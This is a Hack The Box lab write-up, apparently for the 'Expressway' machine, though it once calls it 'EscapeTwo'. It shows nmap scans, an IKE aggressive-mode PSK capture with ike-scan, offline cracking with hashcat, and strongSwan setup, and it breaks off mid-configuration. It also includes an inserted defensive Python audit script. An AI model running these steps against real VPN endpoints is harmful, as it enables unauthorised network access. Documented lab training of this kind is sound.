HTB Expressway Writeup

EscapeTwo is an easy HTB Linux machine, part of season 9.

nmap

┌──(kali㉿kali)-[~/htb/expressway]
└─$ sudo nmap 10.10.11.87 --min-rate 10000 -p-
[sudo] password for kali:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-22 22:13 EDT
Nmap scan report for 10.10.11.87
Host is up (0.21s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh

Nmap done: 1 IP address (1 host up) scanned in 10.79 seconds

┌──(kali㉿kali)-[~/htb/expressway]
└─$ sudo nmap 10.10.11.87 --min-rate 10000 -sU
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-22 22:14 EDT
Nmap scan report for 10.10.11.87
Host is up (0.20s latency).
Not shown: 993 open|filtered udp ports (no-response)
PORT      STATE  SERVICE
500/udp   open   isakmp
814/udp   closed unknown
1023/udp  closed unknown
3702/udp  closed ws-discovery
49184/udp closed unknown
49262/udp closed unknown
54711/udp closed unknown

Nmap done: 1 IP address (1 host up) scanned in 1.13 seconds

┌──(kali㉿kali)-[~/htb/expressway]
└─$ sudo nmap 10.10.11.87 --min-rate 10000 -sU -p 500,814,1023,3702,49184,49262,54711 -sC -sV
[sudo] password for kali:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-22 23:56 EDT
Nmap scan report for 10.10.11.87
Host is up (0.20s latency).

PORT      STATE  SERVICE      VERSION
500/udp   open   isakmp?
| ike-version:
|   attributes:
|     XAUTH
|_    Dead Peer Detection v1.0
814/udp   closed unknown
1023/udp  closed unknown
3702/udp  closed ws-discovery
49184/udp closed unknown
49262/udp closed unknown
54711/udp closed unknown

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 128.41 seconds

┌──(kali㉿kali)-[~/htb/expressway]
└─$ sudo nmap 10.10.11.87 -p 22 -sC -sV
[sudo] password for kali:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-23 00:27 EDT
Nmap scan report for 10.10.11.87
Host is up (0.20s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 10.0p2 Debian 8 (protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 5.53 seconds

Initial nmap scans show only a few pieces of info to go on.

  1. OpenSSH 10.0p2 which is current
  2. isakmp on port 500 UDP.

I’d never heard of isakmp. Google shows that it is for VPN-related Internet Key Exchange traffic.

I’ve never really had much to do with this from an offensive perspective, so after further googling of “IKE traffic penetration testing github” I found a handy blogpost by VeryLazyTech, https://www.verylazytech.com/network-pentesting/ipsec-ike-vpn-port-500-udp, with some methodologies and tools.

First up, the ike-version script for nmap, which gave the same info as the -sC default scripts: XAUTH and Dead Peer Detection v1.0.

Second, ike-scan which gives us some more information:

┌──(kali㉿kali)-[~/htb/expressway]
└─$ ike-scan -M -A 10.10.11.87
Starting ike-scan 1.9.6 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.10.11.87     Aggressive Mode Handshake returned
        HDR=(CKY-R=d31ec53d1ef8b902)
        SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
        KeyExchange(128 bytes)
        Nonce(32 bytes)
        ID(Type=ID_USER_FQDN, Value=ike@expressway.htb)
        VID=09002689dfd6b712 (XAUTH)
        VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)
        Hash(20 bytes)

Ending ike-scan 1.9.6: 1 hosts scanned in 0.211 seconds (4.73 hosts/sec).  1 returned handshake; 0 returned notify

VeryLazyTech says that aggressive mode being enabled is a security risk that opens the door to offline cracking - excellent.
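An added check, written for this writeup and not part of the original post or of ike-scan, that parses the ike-scan handshake output above and flags the settings that make the offline cracking possible (the sample text is copied from the handshake shown above; the severity reasons and suggested fixes are my assumptions):

```python
import re

# Constructed sample: the host block as ike-scan printed it above (values from the writeup).
SAMPLE_IKE_SCAN = """10.10.11.87     Aggressive Mode Handshake returned
        HDR=(CKY-R=d31ec53d1ef8b902)
        SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
        ID(Type=ID_USER_FQDN, Value=ike@expressway.htb)
"""

# SA attributes a defender should flag, with the reason and fix (assumed judgement, not from the page).
WEAK = {
    ("Enc", "3DES"): "3DES is deprecated (64-bit block); use AES-GCM",
    ("Hash", "SHA1"): "SHA1 PRF/integrity is weak; use SHA2-256 or better",
    ("Group", "2:modp1024"): "1024-bit MODP group is too small; use modp2048+ or an ECP group",
}


def parse_sa(text):
    """Return the SA=(...) attributes as a dict, e.g. {'Enc': '3DES', ...}; {} if no SA line."""
    m = re.search(r"SA=\(([^)]*)\)", text)
    if not m:
        return {}
    return dict(kv.split("=", 1) for kv in m.group(1).split())


def audit_ike(text):
    """List findings for one ike-scan host block.

    The headline finding is aggressive mode with PSK: the responder's HASH_R travels in the
    clear, so a captured handshake lets anyone guess the PSK offline (what hashcat 5400 does).
    """
    findings = []
    sa = parse_sa(text)
    aggressive = "Aggressive Mode Handshake returned" in text
    if aggressive:
        findings.append("answers IKEv1 aggressive mode; set aggressive=no (main mode) or move to IKEv2")
    if aggressive and sa.get("Auth") == "PSK":
        findings.append("aggressive mode with PSK: responder hash is crackable offline; use certificate or EAP auth")
    for key, value in sa.items():
        reason = WEAK.get((key, value))
        if reason:
            findings.append(f"{key}={value}: {reason}")
    return findings


if __name__ == "__main__":
    for finding in audit_ike(SAMPLE_IKE_SCAN):
        print("-", finding)
```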

┌──(kali㉿kali)-[~/htb/expressway]
└─$ ike-scan -A --pskcrack 10.10.11.87
Starting ike-scan 1.9.6 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.10.11.87     Aggressive Mode Handshake returned HDR=(CKY-R=e98513996c5da6d0) SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800) KeyExchange(128 bytes) Nonce(32 bytes) ID(Type=ID_USER_FQDN, Value=ike@expressway.htb) VID=09002689dfd6b712 (XAUTH) VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0) Hash(20 bytes)

IKE PSK parameters (g_xr:g_xi:cky_r:cky_i:sai_b:idir_b:ni_b:nr_b:hash_r):
05<..snip..>c89
Ending ike-scan 1.9.6: 1 hosts scanned in 0.210 seconds (4.76 hosts/sec).  1 returned handshake; 0 returned notify
┌──(kali㉿kali)-[~/htb/expressway]
└─$ echo '05<..snip..>c89' > psk.txt

I then used hashcat with rockyou and it took all of 0 seconds to crack.

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5400 (IKE-PSK SHA1)
Hash.Target......: 05...c89
Time.Started.....: Tue Sep 23 14:44:29 2025 (0 secs)
Time.Estimated...: Tue Sep 23 14:44:29 2025 (0 secs)
Kernel.Feature...: Pure Kernel (password length 0-256 bytes)
Guess.Base.......: File (.\rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#01........: 36727.4 kH/s (3.28ms) @ Accel:806 Loops:1 Thr:64 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 9285120/14344385 (64.73%)
Rejected.........: 0/9285120 (0.00%)
Restore.Point....: 6190080/14344385 (43.15%)
Restore.Sub.#01..: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#01...: lilsammy2 -> carmelita4
Hardware.Mon.#01.: Temp: 38c Fan:  0% Util:  9% Core:2625MHz Mem:10251MHz Bus:16

Now with seemingly valid credentials, I actually had no idea how to connect. More research pointed me towards the tool ‘strongswan’, so I installed it and updated my /etc/ipsec.conf and /etc/ipsec.secrets as necessary:

# ipsec.conf - strongSwan IPsec configuration file

# basic configuration

config setup
    charondebug="all"

conn hacktheboxexpressway
    type=tunnel
    auto=start
    keyexchange=ikev1
    authby=secret
    aggressive=yes
    left=10.10.14.3
    leftid=10.10.14.3
    right=10.10.11.87
    rightid=ike@expressway.htb
    ike=3des-sha1-modp1024
    esp=3des-sha1-modp1024
    lifetime=28800s
    ikelifetime=28800s
    xauth=client

# This file holds shared secrets or RSA private keys for authentication.

# RSA private key for this host, authenticating it to any other host
# which knows the public part.

10.10.14.3 ike@expressway.htb : PSK "f<..snip..>d"

┌──(kali㉿kali)-[~/htb/expressway]
└─$ sudo ipsec restart
Stopping strongSwan IPsec...
Starting strongSwan 6.0.2 IPsec [starter]...

┌──(kali㉿kali)-[~/htb/expressway]
└─$ sudo ipsec up hacktheboxexpressway
generating QUICK_MODE request 1660733303 [ HASH SA No KE ID ID ]
sending packet: from 10.10.14.3[500] to 10.10.11.87[500] (300 bytes)
received packet: from 10.10.11.87[500] to 10.10.14.3[500] (76 bytes)
parsed INFORMATIONAL_V1 request 1080286291 [ HASH N(NO_PROP) ]
received NO_PROPOSAL_CHOSEN error notify
establishing connection 'hacktheboxexpressway' failed

I received an error; clearly something was wrong. I googled further and it looks like an additional line may be needed in the secrets file.

# This file holds shared secrets or RSA private keys for authentication.

# RSA private key for this host, authenticating it to any other host
# which knows the public part.

10.10.14.3 ike@expressway.htb : PSK "f<..snip..>d"
10.10.14.3 : XAUTH "ike" "f<..snip..>d"